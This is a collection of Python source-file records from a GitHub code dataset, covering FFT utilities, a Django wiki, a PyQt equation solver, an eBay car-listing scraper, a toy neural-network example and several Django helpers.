= out, (ly_new, lx_new)\n\n return out\n\ndef add_to_fmap(fmap_large, fmap_small, slices_y, slice_x):\n '''\n In-place addition of `fmap_small` to `fmap_large`.\n\n Parameters\n ----------\n fmap_large : (..., ny, nx) array\n Base 2D Fourier coefficients.\n fmap_small : (..., ny', nx') array\n 2D Fourier coefficients to be added.\n slices_y : tuple of slices\n Two slices that select nonzero positive frequences and nonzero\n negaive frequencies. See fkernel.find_kernel_slice.\n slice_x : slice\n Slice with nonzero elements in the x direction.\n \n Returns\n -------\n fmap_large : (..., ny, nx) array\n Input array with addition. \n '''\n\n fmap_large[...,slices_y[0],slice_x] += fmap_small[...,slices_y[0],:]\n fmap_large[...,slices_y[1],slice_x] += fmap_small[...,slices_y[1],:]\n\n return fmap_large\n\ndef get_optimal_fftlen(len_min, even=True):\n '''\n Compute optimal array length for FFT given a minumum length.\n\n Paramters\n ---------\n len_min : int\n Minumum length.\n even : bool, optional\n Demand even optimal lengths (for real FFTs).\n\n Returns\n -------\n len_opt : int\n Optimal length\n\n Notes\n -----\n This assumes we want input sizes that can be factored as 2^a 3^b 5^c 7^d.\n Adapted from ksw.\n '''\n \n if len_min == 0:\n return len_min\n if len_min == 1 and even:\n return 2\n\n max_a = int(np.ceil(np.log(len_min) / np.log(2)))\n max_b = int(np.ceil(np.log(len_min) / np.log(3)))\n max_c = int(np.ceil(np.log(len_min) / np.log(5)))\n max_d = int(np.ceil(np.log(len_min) / np.log(7))) \n\n len_opt = 2 ** max_a # Reasonable starting point.\n for a in range(max_a):\n for b in range(max_b):\n for c in range(max_c):\n for d in range(max_d):\n fftlen = 2 ** a * 3 ** b * 5 ** c * 7 ** d\n if even and fftlen % 2:\n continue\n if fftlen < len_min:\n continue\n if fftlen == len_min:\n len_opt = fftlen\n break\n if fftlen < len_opt:\n len_opt = fftlen\n\n return len_opt\n","repo_name":"AdriJD/optweight","sub_path":"optweight/dft.py","file_name":"dft.py","file_ext":"py","file_size_in_byte":16999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28133177977","text":"from django.shortcuts import render\nfrom . import util\nfrom django import forms\nfrom django.urls import reverse\nfrom django.http import HttpRequest\nfrom django.http import HttpResponseRedirect\nimport markdown2\nimport numpy as np\n\n\n\nclass Search(forms.Form):\n q = forms.CharField(label=\"Search\")\n\nclass NewPage(forms.Form):\n name = forms.CharField(label=\"Page Name\")\n text = forms.CharField(widget=forms.Textarea)\n\nclass EditPage(forms.Form):\n name = forms.CharField(label=\"Page Name\")\n text = forms.CharField(widget=forms.Textarea)\n\n\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", \n {\"entries\": util.list_entries(), \"sform\":Search()}\n )\n\ndef getpage(request, page):\n if util.get_entry(page) == None:\n return render(request, \"encyclopedia/page.html\", \n {\"content\":\"

Error(404): Page not found

\", \"sform\":Search()}\n )\n return render(request, \"encyclopedia/page.html\",\n {\"content\":markdown2.markdown(util.get_entry(page)), \"page\":page, \"sform\":Search()}\n )\n\ndef search(request):\n query = request.GET.get(\"q\", \"\")\n searched = []\n for i in util.list_entries():\n if i.lower() == query:\n return HttpResponseRedirect(reverse(\"wiki:wiki\")+i)\n else:\n if i.lower().find(query) is not -1:\n searched.append(i)\n if not searched:\n return getpage(request, query)\n else:\n return render(request, \"encyclopedia/search.html\",\n {\"results\":searched}\n )\n\ndef newpage(request):\n if request.method == \"POST\":\n form = NewPage(request.POST)\n if form.is_valid():\n name = form.cleaned_data[\"name\"]\n content = form.cleaned_data[\"text\"]\n util.save_entry(name, content)\n return render(request, \"encyclopedia/newpage.html\",\n {\"nform\":NewPage()}\n )\n \ndef random(request):\n size = len(util.list_entries())\n item = np.random.randint(1, size) - 1\n entries = util.list_entries()[:]\n page = entries[item]\n return getpage(request, page)\n\ndef edit(request, page):\n return render(request, \"encyclopedia/edit.html\",\n {\"page\":page, \"eform\":EditPage({'name':page, 'text':util.get_entry(page)}), \"sform\":Search()}\n )\n\ndef save(request):\n if request.method == \"POST\":\n form = EditPage(request.POST)\n if form.is_valid():\n name = form.cleaned_data[\"name\"]\n content = form.cleaned_data[\"text\"]\n util.save_entry(name, content)\n return HttpResponseRedirect(reverse(\"wiki:wiki\")+name)\n","repo_name":"brunnorpdias/CS50W","sub_path":"project_1/wiki/encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71816323049","text":"numList = []\nexceptList = []\nsum = 0\nfor _ in range(9):\n inp = int(input())\n numList.append(inp)\n sum += inp\nbreakFlag = False\nfor i in range(8):\n if(breakFlag == True): break\n for j in range(i + 1, 9):\n if(sum - (numList[i] + numList[j])) == 100:\n if(breakFlag == True): break\n exceptList.extend([numList[i], numList[j]])\n breakFlag = True\n \nnumList.sort()\nfor i in range(9):\n if(numList[i] == exceptList[0] or numList[i] == exceptList[1]):\n continue\n else:\n print(numList[i])\n\n \n \n\n ","repo_name":"jeahun10717/PS","sub_path":"python/2309.py","file_name":"2309.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74629020969","text":"'''\n\n可以直接在显示区输入等式以快速进行一元方程求解\n\n'''\n\nfrom posixpath import split\nfrom re import S, T\nfrom symtable import Symbol\nfrom turtle import position\nimport numpy as np\nimport sys\nimport sympy\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nclass Formula(QMainWindow):\n Signal = pyqtSignal(int)\n def __init__(self, *args, **kwargs):\n \n super().__init__()\n self.UIinit()\n \n \n def UIinit(self):\n \n self.exp = []\n self.ans = []\n self.setWindowTitle(\"方程设置\")\n self.centralwidget = QWidget()\n self.setCentralWidget(self.centralwidget)\n\n self.stackedwidget = QStackedWidget()\n self.Layout = QVBoxLayout(self.centralwidget)\n self.Layout.addWidget(self.stackedwidget)\n\n self.form1 = QWidget()\n self.setup1()\n self.stackedwidget.addWidget(self.form1)\n self.formn = QWidget()\n self.setupn()\n self.stackedwidget.addWidget(self.formn)\n \n self.resize(300, 200)\n \n\n # 界面设置(一元函数情况)\n def setup1(self):\n \n self.Layout1 = QGridLayout(self.form1)\n # 输入ui\n self.unknown_name_label_1 = QLabel()\n self.unknown_name_label_1.setText('输入未知数名称:')\n self.unknown_name_label_1.setAlignment(Qt.AlignLeft)\n self.unknown_name_1 = QLineEdit()\n self.unknown_name_1.setPlaceholderText('输入未知数(例如:x)')\n self.unknown_name_1.setFocus(True)\n \n # 动作按钮\n self.yesbtn_1 = QPushButton('确定')\n self.yesbtn_1.clicked.connect(self.solve_1)\n self.yesbtn_1.setDefault(True)\n self.yesbtn_1.setShortcut('Enter')\n self.nobtn_1 = QPushButton('取消')\n self.nobtn_1.clicked.connect(self.close)\n # 布局\n self.Layout1.addWidget(self.unknown_name_label_1, 1, 0, 1, 2)\n self.Layout1.addWidget(self.unknown_name_1, 2, 0, 1, 2)\n self.Layout1.addWidget(self.yesbtn_1, 3, 0, 1, 1)\n self.Layout1.addWidget(self.nobtn_1, 3, 1, 1, 1)\n\n # 界面设置(多元函数情况)\n def setupn(self):\n \n self.Layoutn = QGridLayout(self.formn)\n\n self.substack = QStackedWidget()\n \n # 输入ui\n self.count_label = QLabel()\n self.count_label.setText('输入方程个数:(超过3个请使用矩阵运算)')\n self.count_label.setAlignment(Qt.AlignLeft)\n self.count_input = QComboBox()\n self.count_input.addItems(['1', '2', '3'])\n self.count_input.currentIndexChanged[int].connect(self.switch)\n \n\n self.subform1 = QWidget()\n self.subset1()\n self.subform2 = QWidget()\n self.subset2()\n self.subform3 = QWidget()\n self.subset3()\n self.substack.addWidget(self.subform1)\n self.substack.addWidget(self.subform2)\n self.substack.addWidget(self.subform3)\n\n # 动作按钮\n self.yesbtn = QPushButton('确定')\n self.yesbtn.clicked.connect(self.solve_n)\n self.yesbtn.setDefault(True)\n self.yesbtn.setShortcut('Enter')\n self.nobtn = QPushButton('取消')\n self.nobtn.clicked.connect(self.close)\n\n # 布局\n self.Layoutn.setSpacing(10)\n self.Layoutn.addWidget(self.count_label, 1, 1, 1, 2)\n self.Layoutn.addWidget(self.count_input, 2, 1, 1, 2)\n self.Layoutn.addWidget(self.substack, 3, 1, 1, 2)\n self.Layoutn.addWidget(self.yesbtn, 6, 1, 1, 1)\n self.Layoutn.addWidget(self.nobtn, 6, 2, 1, 1)\n \n\n def subset1(self):\n self.sublayout1 = QVBoxLayout(self.subform1)\n self.subformula_label_1_1 = QLabel()\n self.subformula_label_1_1.setText('请输入方程:')\n self.subform_input_1_1 = QLineEdit()\n self.subform_input_1_1.setPlaceholderText('输入完整等式(如x=1)')\n \n self.unknown_name_label_1_1 = QLabel()\n self.unknown_name_label_1_1.setText('输入未知数名称:')\n self.unknown_name_label_1_1.setAlignment(Qt.AlignLeft)\n self.unknown_name_1_1 = QLineEdit()\n self.unknown_name_1_1.setPlaceholderText('(例如:x)')\n \n self.sublayout1.addWidget(self.subformula_label_1_1)\n self.sublayout1.addWidget(self.subform_input_1_1)\n self.sublayout1.addWidget(self.unknown_name_label_1_1)\n self.sublayout1.addWidget(self.unknown_name_1_1)\n self.sublayout1.addStretch(1)\n\n\n def subset2(self):\n self.sublayout2 = QVBoxLayout(self.subform2)\n self.subformula_label_2_1 = QLabel()\n self.subformula_label_2_1.setText('请输入方程:')\n self.subform_input_2_1 = QLineEdit()\n self.subform_input_2_1.setPlaceholderText('输入完整等式(如x=1)')\n self.subformula_label_2_2 = QLabel()\n self.subformula_label_2_2.setText('请输入方程:')\n self.subform_input_2_2 = QLineEdit()\n self.subform_input_2_2.setPlaceholderText('输入完整等式(如x=1)')\n \n self.unknown_name_label_2_1 = QLabel()\n self.unknown_name_label_2_1.setText('输入未知数1名称:')\n self.unknown_name_label_2_1.setAlignment(Qt.AlignLeft)\n self.unknown_name_2_1 = QLineEdit()\n self.unknown_name_2_1.setPlaceholderText('(例如:x)')\n self.unknown_name_label_2_2 = QLabel()\n self.unknown_name_label_2_2.setText('输入未知数2名称:')\n self.unknown_name_label_2_2.setAlignment(Qt.AlignLeft)\n self.unknown_name_2_2 = QLineEdit()\n self.unknown_name_2_2.setPlaceholderText('(例如:x)')\n \n self.sublayout2.addWidget(self.subformula_label_2_1)\n self.sublayout2.addWidget(self.subform_input_2_1)\n self.sublayout2.addWidget(self.subformula_label_2_2)\n self.sublayout2.addWidget(self.subform_input_2_2)\n self.sublayout2.addWidget(self.unknown_name_label_2_1)\n self.sublayout2.addWidget(self.unknown_name_2_1)\n self.sublayout2.addWidget(self.unknown_name_label_2_2)\n self.sublayout2.addWidget(self.unknown_name_2_2)\n self.sublayout2.addStretch(1)\n\n \n def subset3(self):\n self.sublayout3 = QVBoxLayout(self.subform3)\n self.subformula_label_3_1 = QLabel()\n self.subformula_label_3_1.setText('请输入方程:')\n self.subform_input_3_1 = QLineEdit()\n self.subform_input_3_1.setPlaceholderText('输入完整等式(如x=1)')\n self.subformula_label_3_2 = QLabel()\n self.subformula_label_3_2.setText('请输入方程:')\n self.subform_input_3_2 = QLineEdit()\n self.subform_input_3_2.setPlaceholderText('输入完整等式(如x=1)')\n self.subformula_label_3_3 = QLabel()\n self.subformula_label_3_3.setText('请输入方程:')\n self.subform_input_3_3 = QLineEdit()\n self.subform_input_3_3.setPlaceholderText('输入完整等式(如x=1)')\n \n self.unknown_name_label_3_1 = QLabel()\n self.unknown_name_label_3_1.setText('输入未知数1名称:')\n self.unknown_name_label_3_1.setAlignment(Qt.AlignLeft)\n self.unknown_name_3_1 = QLineEdit()\n self.unknown_name_3_1.setPlaceholderText('(例如:x)')\n self.unknown_name_label_3_2 = QLabel()\n self.unknown_name_label_3_2.setText('输入未知数2名称:')\n self.unknown_name_label_3_2.setAlignment(Qt.AlignLeft)\n self.unknown_name_3_2 = QLineEdit()\n self.unknown_name_3_2.setPlaceholderText('(例如:x)')\n self.unknown_name_label_3_3 = QLabel()\n self.unknown_name_label_3_3.setText('输入未知数3名称:')\n self.unknown_name_label_3_3.setAlignment(Qt.AlignLeft)\n self.unknown_name_3_3 = QLineEdit()\n self.unknown_name_3_3.setPlaceholderText('(例如:x)')\n \n self.sublayout3.addWidget(self.subformula_label_3_1)\n self.sublayout3.addWidget(self.subform_input_3_1)\n self.sublayout3.addWidget(self.subformula_label_3_2)\n self.sublayout3.addWidget(self.subform_input_3_2)\n self.sublayout3.addWidget(self.subformula_label_3_3)\n self.sublayout3.addWidget(self.subform_input_3_3)\n self.sublayout3.addWidget(self.unknown_name_label_3_1)\n self.sublayout3.addWidget(self.unknown_name_3_1)\n self.sublayout3.addWidget(self.unknown_name_label_3_2)\n self.sublayout3.addWidget(self.unknown_name_3_2)\n self.sublayout3.addWidget(self.unknown_name_label_3_3)\n self.sublayout3.addWidget(self.unknown_name_3_3)\n\n\n def switch(self, count):\n self.count = 0\n self.substack.setCurrentIndex(count)\n self.count = count + 1\n \n\n def input_1(self, exp):\n self.exp = exp\n self.stackedwidget.setCurrentIndex(0)\n self.show()\n\n\n def input_n(self):\n self.stackedwidget.setCurrentIndex(1)\n self.show()\n return\n\n\n def solve_1(self):\n \n self.exp1 = 0\n self.exp2 = 0\n self.unknown = 'x'\n\n try:\n self.exp1 = sympy.sympify(self.exp.split('=', 1)[0])\n self.exp2 = sympy.sympify(self.exp.split('=', 1)[1])\n \n\n self.formula = self.exp1 - self.exp2\n self.unknown = self.unknown_name_1.text()\n self.x = sympy.Symbol(self.unknown)\n\n self.ans = sympy.solve(self.formula, self.x)\n \n except:\n self.formula_error()\n \n self.Signal.emit(1)\n self.close()\n \n\n def solve_n(self):\n\n return None\n\n \n def output(self):\n return self.ans \n\n\n # 异常处理函数\n def formula_error(self):\n reply = QMessageBox.warning(self, \"Warning\", \"不合法的输入!\", QMessageBox.Ok)\n self.ans = ''\n if (reply == QMessageBox.Ok):\n return None\n","repo_name":"Alpacaaaaaa/calculator-app","sub_path":"formula.py","file_name":"formula.py","file_ext":"py","file_size_in_byte":9842,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20165914562","text":"import datetime\n\n__author__ = 'Van'\nfrom math import ceil\nimport hashlib\nimport time\nimport random\n\nimport inject\n\n\nfrom core.crawlers.WebSitesCrawler import *\nfrom core.parsers.Parser import Parser\nfrom core.parsers.ebaycomau import EbayComAuSyntaxAnalyzer\n\nimport logging\n\n\nclass EbayComAuParser(Parser):\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def Parse(self, count):\n pass\n\nclass EbayComAuParserImplement(EbayComAuParser):\n '''\n classdocs\n '''\n @inject.params(crawler=WebSitesCrawler, synaxanalyzer=EbayComAuSyntaxAnalyzer)\n def __init__(self, crawler, synaxanalyzer):\n '''\n Constructor\n '''\n self.crawler = crawler\n self.synaxanalyzer = synaxanalyzer\n\n self.itemOnPage = 200\n self.ListItemsUrl = 'http://www.ebay.com.au/sch/Cars-/29690/i.html?_sop=10&_ipg=200&_pgn={pageNumber}&rt=nc&LH_PrefLoc=1'\n self.SiteHost = 'http://www.ebay.com.au'\n\n # self.timeout_down=5 # timeout in ms\n # self.timeout_up=50 # timeout in ms\n #\n # self.sleep_i=10\n # self.timeout_down_interval=15 # timeout through some requests\n # self.timeout_up_interval=30 # timeout through some requests\n #\n # self.sleep_i_2=100\n # self.timeout_down_interval_2=90 # timeout through some requests\n # self.timeout_up_interval_2=120 # timeout through some requests\n #\n # self.sleep_i_3=1000\n # self.timeout_down_interval_3=15 # timeout through some requests\n # self.timeout_up_interval_3=30 # timeout through some requests\n #\n # self.timeout_down_error=30 # timeout for error\n # self.timeout_up_error=45 # timeout for error\n\n self.timeout_down=250 # timeout in ms\n self.timeout_up=350 # timeout in ms\n\n self.sleep_i=10\n self.timeout_down_interval=500 # timeout through some requests\n self.timeout_up_interval=1500 # timeout through some requests\n\n self.sleep_i_2=100\n self.timeout_down_interval_2=4500 # timeout through some requests\n self.timeout_up_interval_2=6000 # timeout through some requests\n\n self.sleep_i_3=1000\n self.timeout_down_interval_3=7500 # timeout through some requests\n self.timeout_up_interval_3=15000 # timeout through some requests\n\n self.timeout_down_error=1500 # timeout for error\n self.timeout_up_error=3000 # timeout for error\n\n #self.ListItemsUrl = 'http://localhost/ebay/list5.html'\n #self.ListItemsUrl = 'http://localhost/test/test14.html'\n\n def Parse(self, count) :\n countPages = int(ceil(count/float(self.itemOnPage)))\n itemIndex = 0\n for i in range(0, countPages):\n try:\n logging.info(i)\n if itemIndex >= count : break\n url = self.ListItemsUrl.format(pageNumber = i)\n logging.info(url)\n time.sleep(random.uniform(self.timeout_down, self.timeout_up)/1000) #after request it is required to wait\n try:\n content = self.crawler.Get(url)\n listItems = self.synaxanalyzer.AnalyzeList(content)\n except:\n logging.exception('')\n time.sleep(random.uniform(self.timeout_down_error, self.timeout_up_error)/1000) #after request it is required to wait\n continue\n for item in listItems :\n if itemIndex >= count : break\n detailurl = item.Url\n itemIndex = itemIndex + 1\n time.sleep(random.uniform(self.timeout_down, self.timeout_up)/1000) #after request it is required to wait\n\n try:\n contentDetail = self.crawler.Get(detailurl)\n logging.info(detailurl)\n #contentDetail = self.crawler.Get('http://localhost/ebay/detail6.html')\n itemDetail = self.synaxanalyzer.AnalyzeItem(contentDetail)\n except:\n logging.exception('')\n time.sleep(random.uniform(self.timeout_down_error, self.timeout_up_error)/1000) #after request it is required to wait\n continue\n\n m = hashlib.md5()\n m.update(item.Url)\n item.Id = m.hexdigest()\n item.Url= item.Url\n item.OriginalUrl= itemDetail.OriginalUrl\n\n item.ReleaseYear = itemDetail.ReleaseYear\n item.Colour = itemDetail.Colour\n item.Vin = itemDetail.Vin\n item.Doors = itemDetail.Doors\n item.AdditionalFeatures = itemDetail.AdditionalFeatures\n item.Make = itemDetail.Make\n item.Model = itemDetail.Model\n item.BodyType = itemDetail.BodyType\n item.Transmission = itemDetail.Transmission\n item.Engine = itemDetail.Engine\n item.Odometer = itemDetail.Odometer\n item.IsPrivateSeller = itemDetail.IsPrivateSeller\n item.IsNew = itemDetail.IsNew\n\n if None == item.LastModified:\n item.LastModified = datetime.date.fromordinal(datetime.date.today().toordinal() - i)\n\n yield item\n finally:\n if (i%self.sleep_i==0):\n time.sleep(random.uniform(self.timeout_down_interval,self.timeout_up_interval)/1000)#after request it is required to wait\n if (i%self.sleep_i_2==0):\n time.sleep(random.uniform(self.timeout_down_interval_2,self.timeout_up_interval_2)/1000)#after request it is required to wait\n if (i%self.sleep_i_3==0):\n time.sleep(random.uniform(self.timeout_down_interval_3,self.timeout_up_interval_3)/1000)#after request it is required to wait","repo_name":"vanderkorn/searchrobot","sub_path":"core/parsers/ebaycomau/EbayComAu.py","file_name":"EbayComAu.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75296582248","text":"from sklearn.datasets import load_boston\nfrom sklearn.utils import shuffle\nimport matplotlib.pyplot as plt\n\nfrom km.graph import Graph\nfrom km.node import Linear, MSE, PlaceHolder, Sigmoid, Variable\nfrom km.optimizer import GradientDescent\nfrom km.nn import normal, standardization\nfrom km.session import Session\n\nimport numpy as np\n\n\ndef mlp():\n # 载入数据\n data = load_boston()\n dataset = data['data']\n labels = data['target']\n graph = Graph()\n graph.as_default()\n # 初始化参数\n n_features = dataset.shape[1] # X特征数\n n_hidden = 100 # 隐藏层个数\n X = PlaceHolder(name='X')\n y = PlaceHolder(name='y')\n W1 = Variable(normal((n_features, n_hidden), scale=1), name='W1')\n b1 = Variable(np.zeros(n_hidden), name='b1')\n W2 = Variable(normal((n_hidden, 1), scale=1), name='W2')\n b2 = Variable(np.zeros(1), name='b2')\n\n # 定义模型\n l1 = Linear(X, W1, b1, name='l1')\n h1 = Sigmoid(l1, name='h1')\n yhat = Linear(h1, W2, b2, name='yhat')\n loss = MSE(y, yhat, name='loss')\n\n epoch = 5001\n batch_size = 256\n optimizer = GradientDescent(loss, learning_rate=0.001, name='sgd')\n losses = []\n with Session.session(graph) as sess:\n for n in range(epoch):\n data, label = shuffle(dataset, labels)\n loss_sum = 0\n n_step = len(dataset) // batch_size + 1\n for i in range(n_step):\n b = i * batch_size\n e = b + batch_size\n if e > len(dataset):\n b = -batch_size\n e = len(dataset)\n batch_dataset = standardization(data[b:e])\n batch_labels = label[b:e]\n _, los = sess.run([optimizer, loss], feed_dict={X: batch_dataset, y: batch_labels})\n # print('step: {}, loss = {:.3f}'.format(i+1, los))\n loss_sum += los\n if n % 100 == 0:\n print('Epoch: {}, loss = {:.3f}'.format(n + 1, loss_sum / n_step))\n losses.append(los)\n\n plt.plot(losses)\n plt.show()\n\n\nif __name__ == '__main__':\n mlp()\n","repo_name":"fyjun2071/neural_network_scratch","sub_path":"examples/mlp_sk_boston.py","file_name":"mlp_sk_boston.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22019410646","text":"\"\"\"\nControl FTDI USB chips.\n\nOpen a handle using ftd2xx.open or ftd2xx.openEx and use the methods\non the object thus returned.\n\nThere are a few convenience functions too\n\"\"\"\nfrom __future__ import absolute_import\n\nimport sys\n\nfrom .ftd2xx import (\n FTD2XX,\n DeviceError,\n call_ft,\n createDeviceInfoList,\n ft_program_data,\n getDeviceInfoDetail,\n getLibraryVersion,\n listDevices,\n open,\n openEx,\n)\n\n__all__ = [\n \"call_ft\",\n \"listDevices\",\n \"getLibraryVersion\",\n \"createDeviceInfoList\",\n \"getDeviceInfoDetail\",\n \"open\",\n \"openEx\",\n \"FTD2XX\",\n \"DeviceError\",\n \"ft_program_data\",\n]\nif sys.platform == \"win32\":\n from .ftd2xx import w32CreateFile\n\n __all__ += [\"w32CreateFile\"]\nelse:\n from .ftd2xx import getVIDPID, setVIDPID\n\n __all__ += [\"getVIDPID\", \"setVIDPID\"]\n","repo_name":"agentgoblin/ftd2xx","sub_path":"ftd2xx/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12394550292","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='BasicDataset',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200)),\n ('experimentIdea', models.TextField(blank=True)),\n ('hypothesis', models.TextField(blank=True)),\n ('researchObjective', models.TextField(blank=True)),\n ('principles', models.TextField(blank=True)),\n ('dateLastUpdate', models.DateField(default=datetime.date.today, blank=True)),\n ('published', models.BooleanField(default=False)),\n ],\n ),\n migrations.CreateModel(\n name='DataReq',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.TextField(blank=True)),\n ('properties', models.TextField(blank=True)),\n ('deadline', models.DateField(default=datetime.date.today, blank=True)),\n ('dataset', models.ForeignKey(to='protocoltool.BasicDataset')),\n ],\n ),\n migrations.CreateModel(\n name='ExpStep',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.TextField(blank=True)),\n ('output', models.TextField(blank=True)),\n ('deadline', models.DateField(default=datetime.date.today, blank=True)),\n ('dataset', models.ForeignKey(to='protocoltool.BasicDataset')),\n ],\n ),\n migrations.CreateModel(\n name='Partner',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('email', models.EmailField(max_length=100)),\n ('lead', models.BooleanField(default=False)),\n ('dataset', models.ForeignKey(to='protocoltool.BasicDataset')),\n ],\n ),\n migrations.CreateModel(\n name='ResultRep',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.TextField(blank=True)),\n ('output', models.TextField(blank=True)),\n ('deadline', models.DateField(default=datetime.date.today, blank=True)),\n ('dataset', models.ForeignKey(to='protocoltool.BasicDataset')),\n ('partner', models.ForeignKey(to='protocoltool.Partner')),\n ],\n ),\n migrations.AddField(\n model_name='expstep',\n name='partner',\n field=models.ForeignKey(to='protocoltool.Partner'),\n ),\n migrations.AddField(\n model_name='datareq',\n name='partner',\n field=models.ForeignKey(to='protocoltool.Partner'),\n ),\n ]\n","repo_name":"switchonproject/sip-html5-protocol-tool","sub_path":"protocoltool/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39546595227","text":"from lindshop.core.cart.models import Cart\nfrom lindshop.core.category.models import Category\nfrom django.conf import settings\nfrom lindshop import config\n\"\"\"\nThis is a Template Context Processor that include\nall Cart Items on every template, to make the cart\navailable globally on each page of the website.\n\nCall {{cart_items}} in template.\n\"\"\"\n\ndef shop_processor(request):\n\tcontext = {}\n\tcontext = get_cart(context, request)\n\tcontext = get_config(context)\n\tcontext = get_categories(context)\n\n\treturn context\n\ndef get_cart(context, request):\n\tif 'id_cart' in request.session:\n\t\ttry:\n\t\t\tcart = Cart.objects.get(pk=request.session['id_cart'])\n\t\t\titems = cart.cartitem_set.all()\n\t\texcept Cart.DoesNotExist:\n\t\t\titems = None\n\t\t\tcart = None\n\telse:\n\t\titems = None\n\t\tcart = None\n\n\tcontext['cart'] = cart\n\tcontext['cart_items'] = items\n\treturn context\n\ndef get_config(context):\n\tcontext['config'] = config\n\treturn context\n\ndef get_categories(context):\n\tcategories = Category.objects.filter(parent=None).order_by(config.category_order_by)\n\tcontext['categories'] = categories\n\treturn context","repo_name":"marcuslind90/lindshop","sub_path":"utils/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32850803136","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef get_html(url):\n response = requests.get(url)\n return response.text\n\ndef get_total_pages(html):\n soup = BeautifulSoup(html,'html.parser')\n print(soup.prettify())\n pages_ul = soup.find('div', class_=\"vm-pagination\").find('ul')\n last_page = pages_ul.find_all('li')[-3]\n total_page = last_page.find('a').get('href').split(',')\n return total_page[-1]\n\n# def get_page_data(html):\n# soup = BeautifulSoup(html, 'html.parser')\n# product_list = soup.find('div', class_=\"product vm-col vm-col-1 \")\n \n\ndef main():\n nootebooks_url = 'https://enter.kg/computers/noutbuki_bishkek'\n pages = 'results,'\n re = pages + str(get_total_pages(get_html(nootebooks_url)))\n return nootebooks_url + re\n\nlo = BeautifulSoup(main(),'html.parser')\nprint(lo.prettify())\n","repo_name":"ekroma/eorfjwfw","sub_path":"parsing_project/parcing.py","file_name":"parcing.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1154360983","text":"from __future__ import unicode_literals\nfrom django.core.management.base import BaseCommand\nfrom optparse import make_option\n\nimport json\n\nfrom pts.core.models import PackageName\nfrom pts.core.utils import get_or_none\n\n\nclass Command(BaseCommand):\n \"\"\"\n A Django management command which outputs all subscribers for the given\n packages or for all packages, depending on the input parameters.\n emails.\n \"\"\"\n args = '[package ...]'\n\n option_list = BaseCommand.option_list + (\n make_option('--inactive',\n action='store_true',\n dest='inactive',\n default=False,\n help='Show inactive (non-confirmed) subscriptions'),\n make_option('--json',\n action='store_true',\n dest='json',\n default=False,\n help='Output the result encoded as a JSON object'),\n make_option('--udd-format',\n action='store_true',\n dest='udd_format',\n default=False,\n help='Output the result in a UDD compatible format'),\n )\n\n help = (\"Get the subscribers for the given packages.\\n\"\n \"Outputs subscribers to all packges if no arguments are given\")\n\n def warn(self, message):\n if self.verbose:\n self.stderr.write(\"Warning: {}\".format(message))\n\n def handle(self, *args, **kwargs):\n self.verbose = int(kwargs.get('verbosity', 1)) > 1\n inactive = kwargs['inactive']\n self.out_packages = {}\n if len(args) == 0:\n for package in PackageName.objects.all():\n self.output_package(package, inactive)\n else:\n for package_name in args:\n package = get_or_none(PackageName, name=package_name)\n if package:\n self.output_package(package, inactive)\n else:\n self.warn(\"{package} does not exist.\".format(\n package=str(package_name)))\n\n format = 'default'\n if kwargs['json']:\n format = 'json'\n elif kwargs.get('udd_format', False):\n format = 'udd'\n\n return self.render_packages(format)\n\n def output_package(self, package, inactive=False):\n \"\"\"\n Includes the subscribers of the given package in the output.\n\n :param package: Package whose subscribers should be output\n :type package: :py:class:`Package `\n\n :param inactive: Signals whether inactive or active subscriptions\n should be output.\n \"\"\"\n subscriptions = package.subscription_set.filter(active=not inactive)\n self.out_packages[package.name] = [\n str(sub.email_user)\n for sub in subscriptions\n ]\n\n def render_packages(self, format):\n \"\"\"\n Prints the packages and their subscribers to the output stream.\n\n :param use_json: If ``True`` the output is rendered as JSON.\n Otherwise, a legacy format is used.\n :type use_json: Boolean\n \"\"\"\n if format == 'json':\n self.stdout.write(json.dumps(self.out_packages))\n elif format == 'udd':\n for package, subscribers in self.out_packages.items():\n subscriber_out = ', '.join(str(email) for email in subscribers)\n self.stdout.write(\"{}\\t{}\".format(package, subscriber_out))\n else:\n for package, subscribers in self.out_packages.items():\n subscriber_out = ' '.join(str(email) for email in subscribers)\n self.stdout.write(package + ' => [ ' + subscriber_out + ' 